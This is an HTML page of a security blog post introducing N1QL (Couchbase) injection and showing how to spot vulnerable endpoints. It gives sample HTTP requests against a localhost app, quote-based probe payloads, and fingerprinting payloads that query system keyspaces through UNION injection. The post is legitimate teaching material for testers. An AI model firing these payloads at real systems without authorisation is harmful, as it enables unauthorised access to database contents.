<!doctype html>
<html lang="en-us">
  <head>
    <title>N1QL Injection - Part 1 // FelSec - Blog</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.131.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="FelSec" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://felsec.com/css/main.min.b5f4fee110fa265e5b82f29f928caec6ee475bcd8dc3c01bc4a65205cec04336.css" />
    <link rel="stylesheet" href="/css/code.css" />

    
  
    
      
    
  


    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="N1QL Injection - Part 1">
  <meta name="twitter:description" content="A brief introduction into N1QL and N1QL injection.">

    <meta property="og:url" content="https://felsec.com/posts/n1qlinjection-part1/">
  <meta property="og:site_name" content="FelSec - Blog">
  <meta property="og:title" content="N1QL Injection - Part 1">
  <meta property="og:description" content="A brief introduction into N1QL and N1QL injection.">
  <meta property="og:locale" content="en_us">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2024-10-31T09:00:00+01:00">
    <meta property="article:modified_time" content="2024-10-31T09:00:00+01:00">
    <meta property="article:tag" content="Injection">
    <meta property="article:tag" content="Couchbase">
    <meta property="article:tag" content="N1QL">


  </head>
  <body>
    <header class="app-header">
      <a href="https://felsec.com/"><img class="app-header-avatar" src="/avatar.png" alt="FelSec" /></a>
      <h1>FelSec - Blog</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/posts/">Posts</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Penetration Tester. Security Enthusiast. Husband. Cat Dad.</p>
      <div class="app-header-social">
        
          <a target="_blank" href="https://github.com/felsec" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg></a>
        
          <a target="_blank" href="https://twitter.com/felsec" rel="noreferrer noopener"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg></a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">N1QL Injection - Part 1</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Oct 31, 2024
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          4 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line>
</svg>
              <a class="tag" href="https://felsec.com/tags/injection/">Injection</a>
              <a class="tag" href="https://felsec.com/tags/couchbase/">Couchbase</a>
              <a class="tag" href="https://felsec.com/tags/n1ql/">N1QL</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h2 id="introduction">Introduction</h2>
<p>Several months ago, I came across a N1QL injection vulnerability while testing an application. This was a vulnerability I had never come across before and although it was quite easy to understand and exploit, I was unable to find many resources covering it (one or two blog posts and a few CVEs). This pushed me to go down the rabbit hole of discovery to understand how it can be exploited, the pros and cons of each methods, and its limitations.</p>
<p>This series of blog posts will cover what I have been able to learn through my own research.</p>
<ul>
<li>Part 1 - will aim to cover the basics: What N1QL is and how to identify vulnerable endpoints</li>
<li>Part 2 - will cover the different methods of exploitation</li>
<li>Part 3 (coming soon) - will cover some of the more interesting features of N1QL and Couchbase server</li>
</ul>
<h3 id="acknowledgement">Acknowledgement</h3>
<p>Before we dive in, I want to mention this blog post by Krzysztof Pranczk (<a href="https://labs.withsecure.com/publications/n1ql-injection-kind-of-sql-injection-in-a-nosql-database">https://labs.withsecure.com/publications/n1ql-injection-kind-of-sql-injection-in-a-nosql-database</a>), which was a great resource when I was learning about N1QL injection and gave me a great jumping off point for doing my own research.</p>
<h2 id="the-basics">The Basics</h2>
<h3 id="what-is-n1ql">What is N1QL?</h3>
<p>N1QL (pronounced nickel and sometimes referred to as SQL++) is a declarative SQL-like query language that extends SQL for JSON.</p>
<p>As it is based on SQL, if insecure queries or practices are used then injection vulnerabilities will be present.</p>
<h3 id="what-is-n1ql-injection">What is N1QL Injection?</h3>
<p>N1QL injection is a web security vulnerability that enables an attacker to manipulate the N1QL queries that an application makes to the database. Through this they are able to gain unauthorised access to data stored within the database, bypass authentication mechanisms or, in some cases, perform denial of service attacks.</p>
<p>It is essentially SQL injection within a NoSQL database.</p>
<h3 id="identifying-a-vulnerable-endpoint">Identifying a Vulnerable Endpoint</h3>
<h4 id="quick-and-simple">Quick and Simple</h4>
<p>Testing for N1QL injection relies on much the same methodology as SQL injection. A vulnerable endpoint can be identified by appending or inserting a single quote (<code>'</code>) or double quote (<code>&quot;</code>) into the target parameter, which will cause the application to return an error or behave differently.</p>
<p><strong>Normal Request</strong></p>
<pre tabindex="0"><code>Request:
GET /api/blog/p1 HTTP/1.1
Host: localhost
User-Agent: FelSec-Testing

Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[{&#34;$1&#34;:[{&#34;content&#34;:&#34;Coffee is known to boost energy levels and improve mental alertness.&#34;,&#34;id&#34;:&#34;p1&#34;,&#34;title&#34;:&#34;Coffee Benefits&#34;}]}]
</code></pre><p><strong>Injected Request</strong></p>
<pre tabindex="0"><code>Request:
GET /api/blog/p1&#39; HTTP/1.1
Host: localhost
User-Agent: FelSec-Testing

Response:
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 32
Connection: close

{&#34;error&#34;:&#34;Blog post not found&#34;}
</code></pre><p>To confirm the presence of a valid injection point, the following payloads can be used:</p>
<pre tabindex="0"><code>&#39;||&#39;
&#39; AND &#39;abcd&#39;=&#39;abcd
</code></pre><p>For example:</p>
<pre tabindex="0"><code>Request:
GET /api/blog/p1&#39;||&#39; HTTP/1.1
Host: localhost
User-Agent: FelSec-Testing

Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[{&#34;$1&#34;:[{&#34;content&#34;:&#34;Coffee is known to boost energy levels and improve mental alertness.&#34;,&#34;id&#34;:&#34;p1&#34;,&#34;title&#34;:&#34;Coffee Benefits&#34;}]}]
</code></pre><p><em><strong>Note:</strong> There are many more payloads for confirming a valid injection point, the ones above are merely examples.</em></p>
<h4 id="checking-the-backend-db">Checking the Backend DB</h4>
<p>Since the N1QL query language shares several behaviours and functions with other query languages, it is important to confirm that any injection point is within the N1QL query syntax. To achieve this Couchbase database and N1QL specific functions or keyspaces can be used, such as the following:</p>
<pre tabindex="0"><code>&#39; and ENCODE_JSON({})=&#39;{}&#39;
&#39; and BASE64(&#39;a&#39;)=&#39;ImEi&#39;
&#39; and DS_VERSION()=DS_VERSION()--
&#39; and ((SELECT * FROM system:datastores) IS NOT NULL)--
&#39; and ((SELECT * FROM system:my_user_info) IS NOT NULL)--
&#39; UNION (SELECT * FROM system:datastores)--
</code></pre><pre tabindex="0"><code>Request:
GET /api/blog/p1&#39;%20and%20BASE64(&#39;a&#39;)=&#39;ImEi HTTP/1.1
Host: localhost
User-Agent: DB Detection

Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[{&#34;$1&#34;:[{&#34;content&#34;:&#34;Coffee is known to boost energy levels and improve mental alertness.&#34;,&#34;id&#34;:&#34;p1&#34;,&#34;title&#34;:&#34;Coffee Benefits&#34;}]}]
</code></pre><p><em><strong>More functions and keyspaces can be found at the following URLs:</strong></em></p>
<ul>
<li><a href="https://docs.couchbase.com/server/current/n1ql/n1ql-language-reference/functions.html">Functions</a></li>
<li><a href="https://docs.couchbase.com/server/current/n1ql/n1ql-intro/sysinfo.html">System Keyspaces</a></li>
</ul>
<p><em><strong>Useful Note:</strong> When testing for or exploiting N1QL injection vulnerabilities spaces must be URL encoded as <code>%20</code>, using a plus (<code>+</code>) will cause valid payloads to fail.</em></p>
<p>That about covers the basics of N1QL injection and how to detect it. In part 2 we will cover the basic exploits and other useful tricks for extracting information from the database. <a href="/posts/n1qlinjection-part2">Part 2 - Exploiting N1QL Injection</a></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
